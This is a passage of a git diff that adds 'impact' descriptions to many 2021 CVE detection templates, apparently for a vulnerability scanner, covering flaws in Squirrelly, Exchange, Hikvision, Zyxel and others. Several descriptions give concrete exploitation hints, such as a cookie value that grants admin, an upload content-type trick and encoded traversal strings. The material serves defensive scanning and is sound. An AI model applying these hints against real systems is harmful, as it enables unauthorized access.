--- a/http/cves/2021/CVE-2021-32819.yaml +++ b/http/cves/2021/CVE-2021-32819.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nodejs Squirrelly is susceptible to remote code execution. Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Update to the latest version of Nodejs Squirrelly template engine to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-32820.yaml b/http/cves/2021/CVE-2021-32820.yaml index e710225e7a..fb66a8c8dc 100644 --- a/http/cves/2021/CVE-2021-32820.yaml +++ b/http/cves/2021/CVE-2021-32820.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: high description: Express-handlebars is susceptible to local file inclusion because it mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e., file.extension) can be included. Files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: | Update to the latest version of Express-handlebars to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-32853.yaml b/http/cves/2021/CVE-2021-32853.yaml index 2219f3dbb9..5dc676a114 100644 --- a/http/cves/2021/CVE-2021-32853.yaml +++ b/http/cves/2021/CVE-2021-32853.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Erxes before 0.23.0 contains a cross-site scripting vulnerability. The value of topicID parameter is not escaped and is triggered in the enclosing script tag. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to Erxes version 0.23.0 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-3293.yaml b/http/cves/2021/CVE-2021-3293.yaml index 7f728bc8c3..b3d9e02bc8 100644 --- a/http/cves/2021/CVE-2021-3293.yaml +++ b/http/cves/2021/CVE-2021-3293.yaml @@ -5,6 +5,8 @@ info: author: h1ei1 severity: medium description: emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file. + impact: | + An attacker can gain knowledge of the server's file system structure, potentially leading to further attacks. remediation: | Apply the latest patch or upgrade to a version that fixes the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-3297.yaml b/http/cves/2021/CVE-2021-3297.yaml index d033cb5c54..56bb0b2591 100644 --- a/http/cves/2021/CVE-2021-3297.yaml +++ b/http/cves/2021/CVE-2021-3297.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Zyxel NBG2105 V1.00(AAGU.2)C0 devices are susceptible to authentication bypass vulnerabilities because setting the login cookie to 1 provides administrator access. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, unauthorized configuration changes, and potential compromise of the affected device. remediation: | Apply the latest firmware update provided by Zyxel to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-33044.yaml b/http/cves/2021/CVE-2021-33044.yaml index a6f79e56cf..1a994e1ca3 100644 --- a/http/cves/2021/CVE-2021-33044.yaml +++ b/http/cves/2021/CVE-2021-33044.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. + impact: | + An attacker can gain unauthorized access to the device, potentially compromising the security and privacy of the system. remediation: | Apply the latest firmware update provided by Dahua to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-33221.yaml b/http/cves/2021/CVE-2021-33221.yaml index 64d11d5962..d2affbe47a 100644 --- a/http/cves/2021/CVE-2021-33221.yaml +++ b/http/cves/2021/CVE-2021-33221.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: CommScope Ruckus IoT Controller is susceptible to information disclosure vulnerabilities because a 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens). + impact: | + Successful exploitation of this vulnerability could result in the exposure of sensitive data, potentially leading to further attacks or unauthorized access. remediation: | Apply the latest security patches or updates provided by CommScope to mitigate the information disclosure vulnerability (CVE-2021-33221). reference: diff --git a/http/cves/2021/CVE-2021-33357.yaml b/http/cves/2021/CVE-2021-33357.yaml index 7408f7b8d9..7e4459da5d 100644 --- a/http/cves/2021/CVE-2021-33357.yaml +++ b/http/cves/2021/CVE-2021-33357.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | RaspAP 2.6 to 2.6.5 allows unauthenticated attackers to execute arbitrary OS commands via the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";". + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the integrity and confidentiality of the affected system. remediation: | Upgrade RaspAP to a version higher than 2.6.5 to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-33544.yaml b/http/cves/2021/CVE-2021-33544.yaml index 8c6a803e71..d391586d5e 100644 --- a/http/cves/2021/CVE-2021-33544.yaml +++ b/http/cves/2021/CVE-2021-33544.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device, leading to unauthorized access, data theft, or further compromise of the network. remediation: | Apply the latest security patches or firmware updates provided by Geutebruck to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-33564.yaml b/http/cves/2021/CVE-2021-33564.yaml index 62f4f79fff..d763bb7935 100644 --- a/http/cves/2021/CVE-2021-33564.yaml +++ b/http/cves/2021/CVE-2021-33564.yaml @@ -5,6 +5,8 @@ info: author: 0xsapra severity: critical description: Ruby Dragonfly before 1.4.0 contains an argument injection vulnerability that allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade Ruby Dragonfly to version 1.4.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-3374.yaml b/http/cves/2021/CVE-2021-3374.yaml index 9adf8bd14c..7aafc4f705 100644 --- a/http/cves/2021/CVE-2021-3374.yaml +++ b/http/cves/2021/CVE-2021-3374.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Rstudio Shiny Server prior to 1.5.16 is vulnerable to local file inclusion and source code leakage. This can be exploited by appending an encoded slash to the URL. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially exposing sensitive information. remediation: | Upgrade Rstudio Shiny Server to version 1.5.16 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-3377.yaml b/http/cves/2021/CVE-2021-3377.yaml index 65aa75a401..b4ebea75f4 100644 --- a/http/cves/2021/CVE-2021-3377.yaml +++ b/http/cves/2021/CVE-2021-3377.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: npm package ansi_up v4 is vulnerable to cross-site scripting because ANSI escape codes can be used to create HTML hyperlinks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a user's browser, leading to potential data theft or unauthorized actions. remediation: Upgrade to v5.0.0 or later. reference: - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf diff --git a/http/cves/2021/CVE-2021-3378.yaml b/http/cves/2021/CVE-2021-3378.yaml index 53cf74486e..613d07576e 100644 --- a/http/cves/2021/CVE-2021-3378.yaml +++ b/http/cves/2021/CVE-2021-3378.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | FortiLogger 4.4.2.2 is affected by arbitrary file upload issues. Attackers can send a "Content-Type: image/png" header to Config/SaveUploadedHotspotLogoFile and then Assets/temp/hotspot/img/logohotspot.asp. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, and potential compromise of the affected system. remediation: | Apply the latest security patch or upgrade to a patched version of FortiLogger to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-33807.yaml b/http/cves/2021/CVE-2021-33807.yaml index 04c73677ff..0610666621 100644 --- a/http/cves/2021/CVE-2021-33807.yaml +++ b/http/cves/2021/CVE-2021-33807.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and further compromise of the system. remediation: | Apply the latest security patch or update provided by the vendor to fix the directory traversal vulnerability in Cartadis Gespage 8.2.1. reference: diff --git a/http/cves/2021/CVE-2021-33851.yaml b/http/cves/2021/CVE-2021-33851.yaml index f5906d6c9f..a9437e41a4 100644 --- a/http/cves/2021/CVE-2021-33851.yaml +++ b/http/cves/2021/CVE-2021-33851.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts in the context of the victim's browser. remediation: | Update to the latest version of the WordPress Customize Login Image plugin (3.5.3) to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-33904.yaml b/http/cves/2021/CVE-2021-33904.yaml index ae213b8b1b..16ec13e3c2 100644 --- a/http/cves/2021/CVE-2021-33904.yaml +++ b/http/cves/2021/CVE-2021-33904.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via the security/hostSignon.do parameter servProvCode. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Accela Civic Platform (version >21.1) that includes proper input validation to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-34370.yaml b/http/cves/2021/CVE-2021-34370.yaml index 639b9ca05c..512ce149f3 100644 --- a/http/cves/2021/CVE-2021-34370.yaml +++ b/http/cves/2021/CVE-2021-34370.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via ssoAdapter/logoutAction.do successURL. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade to a patched version of Accela Civic Platform (version >21.1) that includes proper input validation and sanitization. reference: diff --git a/http/cves/2021/CVE-2021-34429.yaml b/http/cves/2021/CVE-2021-34429.yaml index 801d73d64f..8aac62557b 100644 --- a/http/cves/2021/CVE-2021-34429.yaml +++ b/http/cves/2021/CVE-2021-34429.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Eclipse Jetty 9.4.37-9.4.42, 10.0.1-10.0.5 and 11.0.1-11.0.5 are susceptible to improper authorization. URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to potential unauthorized access or further attacks. remediation: | Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Eclipse Jetty. reference: diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml index 670e7ae83c..46ee5e18e0 100644 --- a/http/cves/2021/CVE-2021-34473.yaml +++ b/http/cves/2021/CVE-2021-34473.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Microsoft Exchange Server is vulnerable to a remote code execution vulnerability. This CVE ID is unique from CVE-2021-31196, CVE-2021-31206. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Exchange Server, potentially leading to a complete compromise of the system. remediation: Apply Microsoft Exchange Server 2019 Cumulative Update 9 or upgrade to the latest version. reference: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 diff --git a/http/cves/2021/CVE-2021-34621.yaml b/http/cves/2021/CVE-2021-34621.yaml index e7784016b7..33c383fed7 100644 --- a/http/cves/2021/CVE-2021-34621.yaml +++ b/http/cves/2021/CVE-2021-34621.yaml @@ -5,6 +5,8 @@ info: author: 0xsapra severity: critical description: ProfilePress WordPress plugin is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator. + impact: | + An attacker can exploit this vulnerability to create unauthorized admin accounts and gain full control over the WordPress site. remediation: | Update to the latest version of ProfilePress to fix the admin user creation weakness. reference: diff --git a/http/cves/2021/CVE-2021-34640.yaml b/http/cves/2021/CVE-2021-34640.yaml index 6994ab8bee..9c4d061d28 100644 --- a/http/cves/2021/CVE-2021-34640.yaml +++ b/http/cves/2021/CVE-2021-34640.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress Securimage-WP-Fixed plugin 3.5.4 and prior contains a cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file, which allows attackers to inject arbitrary web scripts. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update the Securimage-WP-Fixed plugin to version 3.5.4 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-34643.yaml b/http/cves/2021/CVE-2021-34643.yaml index 6ea1f0e6ea..fc21b36520 100644 --- a/http/cves/2021/CVE-2021-34643.yaml +++ b/http/cves/2021/CVE-2021-34643.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress Skaut Bazar plugin before 1.3.3 contains a reflected cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file, which allows attackers to inject arbitrary web scripts. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Update to the latest version of WordPress Skaut Bazar plugin (1.3.3) or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-34805.yaml b/http/cves/2021/CVE-2021-34805.yaml index 8e75717a4f..050e019e6c 100644 --- a/http/cves/2021/CVE-2021-34805.yaml +++ b/http/cves/2021/CVE-2021-34805.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: FAUST iServer before 9.0.019.019.7 is susceptible to local file inclusion because for each URL request it accesses the corresponding .fau file on the operating system without preventing %2e%2e%5c directory traversal. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server. remediation: | Apply the latest security patch or update to a non-vulnerable version of FAUST iServer. reference: diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml index 664549e65b..a1e8a99627 100644 --- a/http/cves/2021/CVE-2021-35250.yaml +++ b/http/cves/2021/CVE-2021-35250.yaml @@ -6,6 +6,8 @@ info: severity: high description: | SolarWinds Serv-U 15.3 is susceptible to local file inclusion, which may allow an attacker access to installation and server files and also make it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further attacks. remediation: Resolved in Serv-U 15.3 Hotfix 1. reference: - https://github.com/rissor41/SolarWinds-CVE-2021-35250 diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml index 14a6e0ae1b..2efceb1b46 100644 --- a/http/cves/2021/CVE-2021-35265.yaml +++ b/http/cves/2021/CVE-2021-35265.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page." + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of MaxSite CMS or apply the vendor-provided security patch to mitigate the XSS vulnerability (CVE-2021-35265). reference: diff --git a/http/cves/2021/CVE-2021-35336.yaml b/http/cves/2021/CVE-2021-35336.yaml index 164e6d7678..ce5bcd5b5a 100644 --- a/http/cves/2021/CVE-2021-35336.yaml +++ b/http/cves/2021/CVE-2021-35336.yaml @@ -5,6 +5,8 @@ info: author: Pratik Khalane severity: critical description: Tieline IP Audio Gateway 2.6.4.8 and below is affected by a vulnerability in the web administrative interface that could allow an unauthenticated user to access a sensitive part of the system with a high privileged account. + impact: | + An attacker can gain unauthorized access to the admin panel, potentially leading to unauthorized control and manipulation of the audio gateway. remediation: | Upgrade to a patched version of Tieline IP Audio Gateway that fixes the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-35380.yaml b/http/cves/2021/CVE-2021-35380.yaml index 549d2557dc..318923feaf 100644 --- a/http/cves/2021/CVE-2021-35380.yaml +++ b/http/cves/2021/CVE-2021-35380.yaml @@ -6,6 +6,8 @@ info: severity: high description: | TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data. remediation: | Apply the latest patch or upgrade to a non-vulnerable version of TermTalk Server. reference: diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml index 5f2ae560d6..b7476a24d4 100644 --- a/http/cves/2021/CVE-2021-35464.yaml +++ b/http/cves/2021/CVE-2021-35464.yaml @@ -9,6 +9,8 @@ info: The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) found in versions of Java 8 or earlier. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade ForgeRock OpenAM to version 7.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml index aeaf059913..475d421635 100644 --- a/http/cves/2021/CVE-2021-35488.yaml +++ b/http/cves/2021/CVE-2021-35488.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Thruk 2.40-2 contains a cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] in the host or title parameter. An attacker can inject arbitrary JavaScript into status.cgi, leading to a triggered payload when accessed by an authenticated user. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Thruk or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml index 4d87bbf8cc..642f7f8630 100644 --- a/http/cves/2021/CVE-2021-35587.yaml +++ b/http/cves/2021/CVE-2021-35587.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Oracle Access Manager portion of Oracle Fusion Middleware (component: OpenSSO Agent) is vulnerable to remote code execution. Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. This is an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle Access Manager. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-3577.yaml b/http/cves/2021/CVE-2021-3577.yaml index b84aad6b6b..dcac4ddb13 100644 --- a/http/cves/2021/CVE-2021-3577.yaml +++ b/http/cves/2021/CVE-2021-3577.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Motorola Baby Monitors contains multiple interface vulnerabilities could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device, potentially leading to unauthorized access, data theft, or further compromise of the network. remediation: | Apply the latest firmware update provided by Motorola to mitigate the vulnerability and ensure the device is not accessible from untrusted networks. reference: diff --git a/http/cves/2021/CVE-2021-36260.yaml b/http/cves/2021/CVE-2021-36260.yaml index b73548088c..c843970fad 100644 --- a/http/cves/2021/CVE-2021-36260.yaml +++ b/http/cves/2021/CVE-2021-36260.yaml @@ -5,6 +5,8 @@ info: author: pdteam,gy741,johnk3r severity: critical description: Certain Hikvision products contain a command injection vulnerability in the web server due to the insufficient input validation. An attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device. remediation: | Apply the latest firmware update provided by Hikvision to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-36380.yaml b/http/cves/2021/CVE-2021-36380.yaml index 354a18df6c..3d6b1d5ada 100644 --- a/http/cves/2021/CVE-2021-36380.yaml +++ b/http/cves/2021/CVE-2021-36380.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Sunhillo SureLine <8.7.0.1.1 is vulnerable to OS command injection. The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. remediation: | Upgrade to Sunhillo SureLine version 8.7.0.1.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-36450.yaml b/http/cves/2021/CVE-2021-36450.yaml index eaf8cd4164..b1c4bae660 100644 --- a/http/cves/2021/CVE-2021-36450.yaml +++ b/http/cves/2021/CVE-2021-36450.yaml @@ -5,6 +5,8 @@ info: author: atomiczsec severity: medium description: Verint Workforce Optimization 15.2.8.10048 contains a cross-site scripting vulnerability via the control/my_notifications NEWUINAV parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of Verint Workforce Optimization. reference: diff --git a/http/cves/2021/CVE-2021-3654.yaml b/http/cves/2021/CVE-2021-3654.yaml index 87d84d78ad..60fb145970 100644 --- a/http/cves/2021/CVE-2021-3654.yaml +++ b/http/cves/2021/CVE-2021-3654.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Nova noVNC contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks. remediation: | Apply the latest security patches or updates provided by the vendor to fix the open redirect vulnerability in the Nova noVNC application. reference: diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml index ba8f7f725e..c0893da1f5 100644 --- a/http/cves/2021/CVE-2021-36580.yaml +++ b/http/cves/2021/CVE-2021-36580.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | IceWarp Mail Server contains an open redirect via the referer parameter. This can lead to phishing attacks or other unintended redirects. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Apply the latest security patches or updates provided by IceWarp to fix the open redirect vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-36748.yaml b/http/cves/2021/CVE-2021-36748.yaml index dffb3a8186..6478a9e036 100644 --- a/http/cves/2021/CVE-2021-36748.yaml +++ b/http/cves/2021/CVE-2021-36748.yaml @@ -5,6 +5,8 @@ info: author: whoever severity: high description: PrestaHome Blog for PrestaShop prior to version 1.7.8 is vulnerable to a SQL injection (blind) via the sb_category parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Upgrade to PrestaShop version 1.7.8 or later, or apply the provided patch to fix the SQL Injection vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-36749.yaml b/http/cves/2021/CVE-2021-36749.yaml index bc0b41941c..0adef3f0e1 100644 --- a/http/cves/2021/CVE-2021-36749.yaml +++ b/http/cves/2021/CVE-2021-36749.yaml @@ -5,6 +5,8 @@ info: author: _0xf4n9x_ severity: medium description: Apache Druid ingestion system is vulnerable to local file inclusion. The InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system. remediation: | Apply the latest security patches or updates provided by Apache Druid to fix the LFI vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-37216.yaml b/http/cves/2021/CVE-2021-37216.yaml index fbbc7a3e47..d613bdf622 100644 --- a/http/cves/2021/CVE-2021-37216.yaml +++ b/http/cves/2021/CVE-2021-37216.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | QSAN Storage Manager before 3.3.3 contains a reflected cross-site scripting vulnerability. Header page parameters do not filter special characters. Remote attackers can inject JavaScript to access and modify specific data. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade QSAN Storage Manager to version 3.3.3 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-37304.yaml b/http/cves/2021/CVE-2021-37304.yaml index 575a89fa1d..7d5f180fbf 100644 --- a/http/cves/2021/CVE-2021-37304.yaml +++ b/http/cves/2021/CVE-2021-37304.yaml @@ -6,6 +6,8 @@ info: severity: high description: | An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the application. remediation: | Upgrade Jeecg Boot to a version higher than 2.4.5 to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml index c70026920c..cd9940b28b 100644 --- a/http/cves/2021/CVE-2021-37305.yaml +++ b/http/cves/2021/CVE-2021-37305.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Jeecg Boot <= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to unauthorized access or data leakage. remediation: | Upgrade Jeecg Boot to version 2.4.6 or later to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-37416.yaml b/http/cves/2021/CVE-2021-37416.yaml index 2a17b674bb..b771366594 100644 --- a/http/cves/2021/CVE-2021-37416.yaml +++ b/http/cves/2021/CVE-2021-37416.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser. remediation: | Upgrade to a patched version of Zoho ManageEngine ADSelfService Plus (version >6103) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-37538.yaml b/http/cves/2021/CVE-2021-37538.yaml index d12f633a94..1420e956c1 100644 --- a/http/cves/2021/CVE-2021-37538.yaml +++ b/http/cves/2021/CVE-2021-37538.yaml @@ -1,10 +1,12 @@ id: CVE-2021-37538 info: - name: PrestaShop SmartBlog <4.0.6- SQL Injection + name: PrestaShop SmartBlog <4.0.6 - SQL Injection author: whoever severity: critical description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality. + impact: | + An attacker can gain unauthorized access to the database, extract sensitive information, modify data, or perform other malicious activities. remediation: | Upgrade PrestaShop SmartBlog to version 4.0.6 or later to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-37573.yaml b/http/cves/2021/CVE-2021-37573.yaml index 3c22f59263..0fcf24ef31 100644 --- a/http/cves/2021/CVE-2021-37573.yaml +++ b/http/cves/2021/CVE-2021-37573.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's "404 Page not Found" error page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Apply the latest security patches or updates provided by the vendor to fix this 